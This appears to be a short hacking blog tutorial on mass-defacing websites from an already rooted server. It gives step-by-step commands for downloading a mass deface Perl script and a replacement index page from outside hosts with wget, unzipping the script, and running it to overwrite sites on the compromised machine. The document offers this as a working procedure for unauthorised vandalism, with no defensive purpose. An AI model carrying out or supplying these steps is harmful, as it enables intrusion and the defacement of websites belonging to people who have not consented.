Now you can do mass deface when you had rooted a server, So let us start the Mass Defacing tutorial.
Firstly you need a rooted server and mass deface script
MASS DEFACE:
Firstly download mass deface script and as usual we will use wget function
Type: wget www.site.in/massdeface.zip
unzip it by typing
Type: unzip massdeface.zip
One you have unziped it , we will now run the script by typing
Type: perl massdeface.pl
Now after we have run the script it will show its usage [ perl mass.pl /tmp/index.html ], so according to that we have to run it, but before we do so we have to download our deface page using wget .
Type: wget http://www.site.com/index.html
So once we have downloaded our deface page, now we will run the final command to mass deface .
Type: perl massdeface.pl /tmp/index.html
Post a Comment